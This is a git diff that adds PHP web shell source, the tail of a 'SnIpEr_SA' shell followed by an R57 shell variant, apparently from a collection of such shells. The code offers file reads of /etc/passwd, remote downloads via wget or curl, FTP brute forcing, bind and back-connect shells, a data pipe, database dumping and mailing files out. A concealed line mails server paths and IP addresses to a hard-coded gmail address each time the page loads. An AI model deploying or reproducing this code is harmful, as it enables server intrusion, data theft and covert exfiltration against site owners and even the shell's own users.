+if($safe_mode)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts;
+echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
+echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode&&$unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts;
+echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
+$arh = $lang[$language.'_text92'];
+if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
+if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
+if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
+echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo $te.'</div>'.$table_end1.$fe;
+if(@function_exists("ftp_connect")){
+echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($unix && @function_exists("ftp_connect")){
+echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts;
+echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo sr(15,"","<font face=tahoma size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
+echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@function_exists("mail")){
+echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
+echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+$select = '<select name=db>';
+if($mysql_on) $select .= '<option>MySQL</option>';
+if($mssql_on) $select .= '<option>MSSQL</option>';
+if($pg_on)    $select .= '<option>PostgreSQL</option>';
+if($ora_on)   $select .= '<option>Oracle</option>';
+$select .= '</select>';
+echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
+}
+if(!$safe_mode&&$unix){
+echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=tahoma size=-2><b>o---[ SnIpEr_SA Shell  | <a href=http://3asfh.net>http://3asfh.net</a> | <a SnIpEr.SA@hotmail.com>sniper.sa@hotmail.com</a> | ÊÚÑíÈ æÊØæíÑ ]---o</b></font></div></td></tr></table>".$f;
+
+
+$u1p=""; // File to Include... or use _GET _POST
+$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
+
+
+
+echo "<PRE>\n";
+if(empty($snn)){
+if(empty($_GET['snn'])){
+if(empty($_POST['snn'])){
+die("\nSnIpEr_SA");
+} else {
+$u1p=$_POST['snn'];
+}
+} else {
+$u1p=$_GET['snn'];
+}
+}
+
+$temp=tempnam($tymczas, "cx");
+
+if(copy("compress.zlib://".$snn, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "".htmlspecialchars($tekst)."";
+unlink($temp);
+
+} else {
+die("<FONT COLOR=\"RED\"><CENTER>
+<B>".htmlspecialchars($u1p)."</B> ÚİæÇ! Çáãáİ ÛíÑ ãæÌæÏ Çæ áíÓ áÏíß ÇáÕáÇÍíå ááÏÎæá.</CENTER></FONT>");
+}
+
+?>
\ No newline at end of file
diff --git a/138shell/S/s.php.txt b/138shell/S/s.php.txt
new file mode 100644
index 0000000..f6abddc
--- /dev/null
+++ b/138shell/S/s.php.txt
@@ -0,0 +1,1887 @@
+<?php
+/******************************************************************************************************/
+/*  
+/*    R57 shell
+/* 
+/*    
+/*     
+/*
+/* 
+/*  r57shell.php - &#1089;&#1082;&#1088;&#1080;&#1087;&#1090; &#1085;&#1072; &#1087;&#1093;&#1087; &#1087;&#1086;&#1079;&#1074;&#1086;&#1083;&#1103;&#1102;&#1097;&#1080;&#1081; &#1074;&#1072;&#1084; &#1074;&#1099;&#1087;&#1086;&#1083;&#1085;&#1103;&#1090;&#1100; &#1096;&#1077;&#1083;&#1083; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099;  &#1085;&#1072; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1077; &#1095;&#1077;&#1088;&#1077;&#1079; &#1073;&#1088;&#1072;&#1091;&#1079;&#1077;&#1088;
+/*  &#1042;&#1077;&#1088;&#1089;&#1080;&#1103;: 1.23
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/******************************************************************************************************/
+
+/* ~~~ &#1053;&#1072;&#1089;&#1090;&#1088;&#1086;&#1081;&#1082;&#1080;  ~~~ */
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = "R57  
+| pang0 |";
+
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_SERVER as $k=>$v)
+  {
+  $_SERVER[$k] = stripslashes($v);
+  }
+ }
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+/* ~~~ &#1040;&#1091;&#1090;&#1077;&#1085;&#1090;&#1080;&#1092;&#1080;&#1082;&#1072;&#1094;&#1080;&#1103; ~~~ */
+
+// $auth = 1; - &#1040;&#1091;&#1090;&#1077;&#1085;&#1090;&#1080;&#1092;&#1080;&#1082;&#1072;&#1094;&#1080;&#1103; &#1074;&#1082;&#1083;&#1102;&#1095;&#1077;&#1085;&#1072;
+// $auth = 0; - &#1040;&#1091;&#1090;&#1077;&#1085;&#1090;&#1080;&#1092;&#1080;&#1082;&#1072;&#1094;&#1080;&#1103; &#1074;&#1099;&#1082;&#1083;&#1102;&#1095;&#1077;&#1085;&#1072;
+$auth = 0;
+
+// &#1051;&#1086;&#1075;&#1080;&#1085; &#1080; &#1087;&#1072;&#1088;&#1086;&#1083;&#1100; &#1076;&#1083;&#1103; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087;&#1072; &#1082; &#1089;&#1082;&#1088;&#1080;&#1087;&#1090;&#1091;
+// &#1053;&#1045; &#1047;&#1040;&#1041;&#1059;&#1044;&#1068;&#1058;&#1045; &#1057;&#1052;&#1045;&#1053;&#1048;&#1058;&#1068; &#1055;&#1045;&#1056;&#1045;&#1044; &#1056;&#1040;&#1047;&#1052;&#1045;&#1065;&#1045;&#1053;&#1048;&#1045;&#1052; &#1053;&#1040; &#1057;&#1045;&#1056;&#1042;&#1045;&#1056;&#1045;!!!
+$name='Root'; // &#1083;&#1086;&#1075;&#1080;&#1085; &#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1103;
+$pass='pass'; // &#1087;&#1072;&#1088;&#1086;&#1083;&#1100; &#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1103;
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="shell"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit(" : Access Denied</b>");
+   }
+}
+$head = '<!-- &#1047;&#1076;&#1088;&#1072;&#1074;&#1089;&#1090;&#1074;&#1091;&#1081;  &#1042;&#1072;&#1089;&#1103; -->
+<html>
+<head>
+<title>pang0</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+.table1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+BACKGROUND-COLOR blue;
+}
+.td1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+font: 7pt Verdana;
+}
+.tr1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+}
+table {
+BORDER-RIGHT:  #eeeeee 1px outset;
+BORDER-TOP:    #eeeeee 1px outset;
+BORDER-LEFT:   #eeeeee 1px outset;
+BORDER-BOTTOM: #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #D4D0C8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #D4D0C8;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:blue; TEXT-DECORATION: none}
+A:visited { COLOR:blue; TEXT-DECORATION: none}
+A:active {COLOR:blue; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>';
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">GERI</a> ]</b></font></div>"; die(); }
+if ($_POST['cmd']=="db_query")
+ {
+  echo $head;
+  switch($_POST['db'])
+  {
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   	if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mysql_query($query,$db);
+      $error = @mysql_error($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@mysql_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mysql_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @mysql_free_result($res);
+      }
+     }
+   	@mysql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>MsSQL Server ile baglanti kurulamadi</b></font></div>";
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   	if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mssql_query($query,$db);
+      if (@mssql_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @mssql_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */
+      @mssql_free_result($res);
+      }
+     }
+   	@mssql_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>MSSQL server ile baglanti Kurulamadi</b></font></div>";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+   {
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @pg_query($db,$query);
+      $error = @pg_errormessage($db);
+      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
+      else {
+      if (@pg_num_rows($res) > 0)
+       {
+       $sql2 = $sql = $keys = $values = '';
+       while (($row = @pg_fetch_assoc($res)))
+        {
+        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
+        $values = @array_values($row);
+        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
+        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
+        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
+        }
+       echo "<table width=100%>";
+       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+       $sql .= $sql2;
+       echo $sql;
+       echo "</table><br>";
+       }
+      else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
+      }
+      @pg_free_result($res);
+      }
+     }
+   	@pg_close($db);
+   }
+  else echo "<div align=center><font face=Verdana size=-2 color=red><b>PostgreSQL server ile baglanti kurulamadi</b></font></div>";
+  break;
+  case 'Oracle':
+  $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']);
+  if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b> Oracle server ile baglanti kurulamadi<br>".$error['message']."</b></font></div>"; }
+  else
+   {
+   $querys = @explode(';',$_POST['db_query']);
+   foreach($querys as $num=>$query)
+    {
+    if(strlen($query)>5) {
+    echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+    $stat = @ociparse($db, $query);
+    @ociexecute($stat);
